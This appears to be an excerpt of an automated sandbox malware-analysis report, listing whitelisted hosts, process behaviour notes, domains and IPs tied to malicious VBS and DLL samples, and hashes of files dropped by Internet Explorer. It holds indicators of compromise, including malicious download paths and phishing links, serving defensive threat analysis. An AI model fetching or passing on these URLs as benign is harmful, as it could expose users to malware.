Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, rundll32.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 51.104.139.180, 104.108.39.131, 52.155.217.156, 20.54.26.129, 8.248.135.254, 67.26.75.254, 8.253.204.249, 8.241.123.126, 8.253.204.121, 152.199.19.161, 92.122.213.194, 92.122.213.247, 104.43.139.144, 51.104.144.132, 13.83.66.189, 13.83.66.62, 13.83.66.119, 13.83.65.212, 13.83.66.22, 13.88.85.215, 51.104.136.2, 20.49.150.241 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net Execution Graph export aborted for target mshta.exe, PID 3096 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:34:24	API Interceptor	1x Sleep call for process: wscript.exe modified
20:35:44	API Interceptor	43x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
47.241.19.44	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	JeSoTz0An7tn.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	1qdMIsgkbwxA.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	earmarkavchd.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	2200.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	22.dll	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	mRT14x9OHyME.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	4N9Gt68V5bB5.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	34UO9lvsKWLW.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	csye1F5W042k.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	0cJWsqWE2WRJ.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	api10.laptok.at/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
resolver1.opendns.com	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	208.67.222.222
	5fbce6bbc8cc4png.dll	Get hash	malicious	Browse	208.67.222.222
	JeSoTz0An7tn.vbs	Get hash	malicious	Browse	208.67.222.222
	1qdMIsgkbwxA.vbs	Get hash	malicious	Browse	208.67.222.222
	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	208.67.222.222
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	208.67.222.222
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	208.67.222.222
	earmarkavchd.dll	Get hash	malicious	Browse	208.67.222.222
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	208.67.222.222
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	208.67.222.222
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	208.67.222.222
	fY9ZC2mGfd.exe	Get hash	malicious	Browse	208.67.222.222
	H58f3VmSsk.exe	Get hash	malicious	Browse	208.67.222.222
	2200.dll	Get hash	malicious	Browse	208.67.222.222
	5faabcaa2fca6rar.dll	Get hash	malicious	Browse	208.67.222.222
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	208.67.222.222
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	208.67.222.222
	YjimyNp5ma.exe	Get hash	malicious	Browse	208.67.222.222
	0cJWsqWE2WRJ.vbs	Get hash	malicious	Browse	208.67.222.222
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	208.67.222.222
myip.opendns.com	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	84.17.52.25
	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	84.17.52.25
	earmarkavchd.dll	Get hash	malicious	Browse	84.17.52.25
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	84.17.52.25
	fY9ZC2mGfd.exe	Get hash	malicious	Browse	84.17.52.40
	H58f3VmSsk.exe	Get hash	malicious	Browse	84.17.52.40
	YjimyNp5ma.exe	Get hash	malicious	Browse	84.17.52.40
	4.exe	Get hash	malicious	Browse	84.17.52.10
	PtgzM1Gd04Up.vbs	Get hash	malicious	Browse	84.17.52.10
	Win7-SecAssessment_v7.exe	Get hash	malicious	Browse	91.132.136.164
	Capasw32.dll	Get hash	malicious	Browse	84.17.52.80
	my_presentation_u6r.js	Get hash	malicious	Browse	84.17.52.22
	open_attach_k7u.js	Get hash	malicious	Browse	84.17.52.22
	ZwlegcGh.exe	Get hash	malicious	Browse	84.17.52.22
	dokument9903340.hta	Get hash	malicious	Browse	84.17.52.22
	look_attach_s0r.js	Get hash	malicious	Browse	84.17.52.22
	my_presentation_u5c.js	Get hash	malicious	Browse	84.17.52.22
	presentation_p6l.js	Get hash	malicious	Browse	84.17.52.22
	job_attach_x0d.js	Get hash	malicious	Browse	84.17.52.22
	UrsnifSample.exe	Get hash	malicious	Browse	84.17.52.78
c56.lepini.at	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	47.241.19.44
	JeSoTz0An7tn.vbs	Get hash	malicious	Browse	47.241.19.44
	1qdMIsgkbwxA.vbs	Get hash	malicious	Browse	47.241.19.44
	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	47.241.19.44
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	47.241.19.44
	2200.dll	Get hash	malicious	Browse	47.241.19.44
	0RLNavifGxAL.vbs	Get hash	malicious	Browse	47.241.19.44
	1ImYNi1n8qsm.vbs	Get hash	malicious	Browse	47.241.19.44
	http://c56.lepini.at	Get hash	malicious	Browse	47.241.19.44

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	47.241.19.44
	http://qaht.midlidl.com/index	Get hash	malicious	Browse	8.208.98.199
	https://bit.ly/3nLKwPu	Get hash	malicious	Browse	8.208.98.199
	Response_to_Motion_to_Vacate.doc	Get hash	malicious	Browse	47.254.169.80
	https://bit.ly/2UR10cF	Get hash	malicious	Browse	8.208.98.199
	JeSoTz0An7tn.vbs	Get hash	malicious	Browse	47.241.19.44
	1qdMIsgkbwxA.vbs	Get hash	malicious	Browse	47.241.19.44
	https://bit.ly/3lYk4Bx	Get hash	malicious	Browse	8.208.98.199
	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	47.241.19.44
	https://bouncy-alpine-yam.glitch.me/#j.dutheil@dagimport.com	Get hash	malicious	Browse	47.254.218.25
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44
	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse	47.241.19.44
	https://bit.ly/35MTO80	Get hash	malicious	Browse	8.208.98.199
	videorepair_setup_full6715.exe	Get hash	malicious	Browse	47.91.67.36
	http://banchio.com/common/imgbrowser/update/index.php	Get hash	malicious	Browse	47.241.0.4
	earmarkavchd.dll	Get hash	malicious	Browse	47.241.19.44
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse	47.241.19.44
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse	47.241.19.44
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse	47.241.19.44
	1119_673423.doc	Get hash	malicious	Browse	8.208.13.158

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\earmark.avchd	0k4Vu1eOEIhU.vbs	Get hash	malicious	Browse
	6znkPyTAVN7V.vbs	Get hash	malicious	Browse
	a7APrVP2o2vA.vbs	Get hash	malicious	Browse
	03QKtPTOQpA1.vbs	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{174A4BA0-2E8C-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7720649020273236
Encrypted:	false
SSDEEP:	48:IwzGcpri7GwpLCG/ap8zrGIpcKGvnZpv8Go5Pqp9CGo4NTzpm5GW55FTo4GW57Te:rJZ+Zo2z9W3toifFNTzMVbR6zfBWcpB
MD5:	5DEB0017862BB790072DDA8EEEF8AAFC
SHA1:	8BD7C747F7245B734663A5C908D0290990EBB0CB
SHA-256:	A1C401660840580CFC4F5B57B922761BB12211301D6A7F20862D090191208B00
SHA-512:	432F7AC02B586A2E793F97E81EC6B5E68F23888E45B29C8C08CCEF000D3779DFEC1FFECE426165C272A579BA48400FE206921121734AAE41229DC2675B218F1F
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{32EE892B-2E8C-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	50312
Entropy (8bit):	1.9926269390046003
Encrypted:	false
SSDEEP:	192:rFrZbmZEv2Co9WttyifSc+zMG2Ba2D7jicONMDu3pMzt2pMzfVN2BzmWX+gpznM4:r/WdxUXbjhHrXsN1GoT
MD5:	D35FC3A0C308572AE63AD8E3450AF5A3
SHA1:	DE10833251B928FCF16135977FE49A6957956FAC
SHA-256:	5716A2788A1843C69DA30A772150E337BA08C2C01FA7E8B9DCD4D4943FD3223B
SHA-512:	E9EF63C1BDEA070C79C6A3FBFD6156432751D48411DA590D531EBCC08964B40CC8492A54AA4A06753C083C7F02B86A46B6580A2CA892D3558408E6D5745603EF
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{174A4BA2-2E8C-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28140
Entropy (8bit):	1.9203254743011586
Encrypted:	false
SSDEEP:	192:rsZfQE6uk2FjB2QkWLMKYNVUl1l0Ue14A:rsYvP2hwU4KEVs0T1b
MD5:	04CE13E9E60268021A2B153BDC284B29
SHA1:	093F6DC4ECD64DE541FC4D2B5A673AF7A7BB4B61
SHA-256:	C40B1DEEF8302488CAEBE76A0F423A02E96ACE850E83B79C779A90CCE913AB77
SHA-512:	C15486DB763028FEAD675EB82556FC0AFB95FFD13A57BEAAF9D383F5B2F76A5AF75FC4D1BE8FFF549E5E133828FA8E2AA83FBA8CED1CD38C127CE42D6BAAE29E
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{32EE892D-2E8C-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28144
Entropy (8bit):	1.9210229833549737
Encrypted:	false
SSDEEP:	192:rkZHQX6dkmFjN2OkWqMZYZHuf/7mBN01euf/7mBNgqA:rUwqGmhEqrZQHuf/yrYeuf/yrgN
MD5:	446277B2CC8BEB2AEE3CF6EAE8184097
SHA1:	4F9F8F577609D154DFF1E9C821D5F18462BBD506
SHA-256:	BC0C130B9F3588CA51B75C9E74A7C3DD79180E7BCD4F9C733E67E6D583487FA7
SHA-512:	6EA5B2559A3FB0ECEC0DE987F56025337B5FC939EE44C86C3C977C00A4C16F51501EC20C0F9EC424C468D3501C6C1D1B7A6FA508EE5A3913C7F1EBD1EABE6864
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{32EE892F-2E8C-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28172
Entropy (8bit):	1.9277011535168063
Encrypted:	false
SSDEEP:	192:rEZzQ365kFFjl32nkWBMsYta5w3vlah5w3WuA:r08KKFhlGTaskau39ahu3WJ
MD5:	075EB9154DCE3DF4101B287A04038523
SHA1:	BC06A22A908AFB53D9D443E8A6C44584FDEE92B1
SHA-256:	7B73AFD703CDF558FE5C9E56C4E58544BD72CBFF7B65BA546E9209BF205B5FF0
SHA-512:	3BB5E46A9D203B05CACBD9A99B1E1EC6BE26C6AAED2DEC49A36AA547EBD1F6C70801BDF22BF85E713FB467F57BBD78D974039971FE057F153C667D7BFAFF1CAC
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.096353243250623
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEi5jM5VnWimI002EtM3MHdNMNxOEi5j8VnWimI00OYGVbkEtMb:2d6NxOn6jSZHKd6NxOnESZ7YLb
MD5:	287A90B0EE135AA2DB0A75E5B6A4BEA4
SHA1:	1A93DE1F0B734695D330E6631C4B4483711ABE49
SHA-256:	611AFC4DDDE83D2E7555471EA23AE111C6D02E9B437ED16DFEC65AFFB8B4A0A0
SHA-512:	910F53D1AEC5ECBC7C822AE0602CCC40A4B5E1E4F05AB49873836978EC2D2D936DB7B60E1388EDE6612745CE8978AEACB3EDF45C76C809A0249B6CC0D00990F5
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xee4d021a,0x01d6c298</date><accdate>0xee4d021a,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xee4d021a,0x01d6c298</date><accdate>0xee4f6471,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.139791372155009
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kGjoVnWimI002EtM3MHdNMNxe2kGjoVnWimI00OYGkak6EtMb:2d6Nxr4SZHKd6Nxr4SZ7Yza7b
MD5:	63BA17D1901F41986964A41F76EB37ED
SHA1:	43F2E9521C022F397297EC3CF55C479D6B68235C
SHA-256:	5FE6A77273B7072613F3C03B3E0A26422D970A8A01DE4D7339BE35839C5E5CF9
SHA-512:	50CA5688B9D04BF692C0DEDD34662BE6A8E351AB8301E9903BF59D580EB33D14ACABCC5503B614347B1E5DDA6B3001200210CB686C84DCD358AF71B59AF20E30
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xee483d63,0x01d6c298</date><accdate>0xee483d63,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xee483d63,0x01d6c298</date><accdate>0xee483d63,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.136210594558597
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLSj8VnWimI002EtM3MHdNMNxvLSj8VnWimI00OYGmZEtMb:2d6NxvRSZHKd6NxvRSZ7Yjb
MD5:	96A46DE45D8F2F131988B9F480F8AC7D
SHA1:	CBEBA5FE699C5E04D3DC2373DC46CE73F944BCB1
SHA-256:	4B98390C39FA17643CAEB61376C029CDB9A4971FEC6E8F7433567AD7247DAD57
SHA-512:	720CEC3FD8777423C84197A4A9075C11B00C691DFF0D8BB15EDCE08642C1A2C63A71FC096BE353A82D03814E116EEFB8BA285CB26C81CBEBC66977D0895DC0E5
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xee4f6471,0x01d6c298</date><accdate>0xee4f6471,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xee4f6471,0x01d6c298</date><accdate>0xee4f6471,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.117413717774021
Encrypted:	false
SSDEEP:	12:TMHdNMNxiyoMjMoMVnWimI002EtM3MHdNMNxiyoMjMoMVnWimI00OYGd5EtMb:2d6Nx1ajSZHKd6Nx1ajSZ7YEjb
MD5:	F083A03BE8884A26EDC2F0396B479B4E
SHA1:	1211D26BB87B8046E6D322385E54D56FC8BB3599
SHA-256:	84B92D1BCAB518F133C533085AFC94BFA3C71E84B3312E1F5A214C4A0DD0DDBF
SHA-512:	E47039AC99239D07A52EEB47467F9E2C5CEC4058DDE791162803B5F1275BE08D9B90E502EC1EDDFB3F12CAFAD3BCC56A82F60029E492826575EB5B081006CD33
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xee4a9fbf,0x01d6c298</date><accdate>0xee4a9fbf,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xee4a9fbf,0x01d6c298</date><accdate>0xee4a9fbf,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.15039136117362
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwSj8VnWimI002EtM3MHdNMNxhGwSj8VnWimI00OYG8K075EtMb:2d6NxQ0SZHKd6NxQ0SZ7YrKajb
MD5:	8895957154949A4706F0DEF814F770CD
SHA1:	38E577A5BAF4AE532ABFB809FC76ED9F2974B201
SHA-256:	2FBA92598D57181A87B83A8A70E8EBF8864226BE75DBB9B17CEF752049C3AA18
SHA-512:	F40A866C1404920A2017D154D80FCB4D71936D6AF613CD4F5D9E91B1F5F5C9D0ADA90872DF00F25476C8C3C17BF239992CF88809A128C007CF2791547768B739
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xee4f6471,0x01d6c298</date><accdate>0xee4f6471,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xee4f6471,0x01d6c298</date><accdate>0xee4f6471,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.086960229611107
Encrypted:	false
SSDEEP:	12:TMHdNMNx0ni5jM5VnWimI002EtM3MHdNMNx0ni5jM5VnWimI00OYGxEtMb:2d6Nx0i6jSZHKd6Nx0i6jSZ7Ygb
MD5:	E72D566521BE120185AB36D473462F02
SHA1:	2621C0A7B13117E2DE8968AA741E4213C4AAA306
SHA-256:	2DDC5821699E87C2CBE241270D96411C6794FF865F768DDD02784B449BDAC773
SHA-512:	83C93A5F0BD3E04AC82083355A51ACA25CCA9C489843291087D8F9F30D18715F0CA19B9E037B54B7C8944C357830FFE165BA670B1B609F20683F7C3AF48354A5
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xee4d021a,0x01d6c298</date><accdate>0xee4d021a,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xee4d021a,0x01d6c298</date><accdate>0xee4d021a,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.125421039224645
Encrypted:	false
SSDEEP:	12:TMHdNMNxxi5jM5VnWimI002EtM3MHdNMNxxi5jM5VnWimI00OYG6Kq5EtMb:2d6Nxo6jSZHKd6Nxo6jSZ7Yhb
MD5:	4199DF63EF7E7ABCF1873B1B5748EAE7
SHA1:	E386BE6E104C9D2C138B69F20B32B17439EDC454
SHA-256:	B5ECCB3B661016A616A5C37608922AE693E8E3DAAF3C7326228E3D208766AA82
SHA-512:	1A437E774E4E5B939BEF6BA4DC81F4DAF2030BF899B0A03E5369DC5EC0982C04FA680915AC34842CC58020ADEB96CE47FE4F161D23A453F6F53FEB6E917E834A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xee4d021a,0x01d6c298</date><accdate>0xee4d021a,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xee4d021a,0x01d6c298</date><accdate>0xee4d021a,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.115410230705591
Encrypted:	false
SSDEEP:	12:TMHdNMNxcyoMjMoMVnWimI002EtM3MHdNMNxcyoMjMoMVnWimI00OYGVEtMb:2d6NxzajSZHKd6NxzajSZ7Ykb
MD5:	129D6E98D96D11CD87309DC26645D861
SHA1:	DF538D1CF3EAC7D1B3DF6591D2BCA8E93CD1654F
SHA-256:	E5C2CC88B4EDE3B9BDC63DA6384F1482B0F5224BCE1ED8509FE1DADF5A5E347A
SHA-512:	3B27D2C2BA266DFAFE3697975E76ADBA6E51B0EA0ECDD975F935E331FE68FF49D392DB659D7B1CD0C3E1B7AAD2B0D551C85A3A31D8B0B152B55920257C0233C2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xee4a9fbf,0x01d6c298</date><accdate>0xee4a9fbf,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xee4a9fbf,0x01d6c298</date><accdate>0xee4a9fbf,0x01d6c298</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.1026832280870495
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnyoMjMoMVnWimI002EtM3MHdNMNxfnyoMjMoMVnWimI00OYGe5EtMb:2d6Nx6ajSZHKd6Nx6ajSZ7YLjb
MD5:	BE71D9C1E4762C781FFCE45612F2E814
SHA1:	482C3789419A25C2C57CB0197F761279DBF61FEF
SHA-256:	2624F89CCE872CDB1981BBA731299A4B1FE3F6B72C3E51792B3317396142510D
SHA-512:	B8237A49B5B6AB3BBC032C8E78988FE35E81CA526AE7F675E68FA57FEF0F37E4B25EE486D9AE8DDF3C2CA89E5ACE40BA29C6B7B2257CA6FED6591DB2F5BAB9D5
Malicious:	false
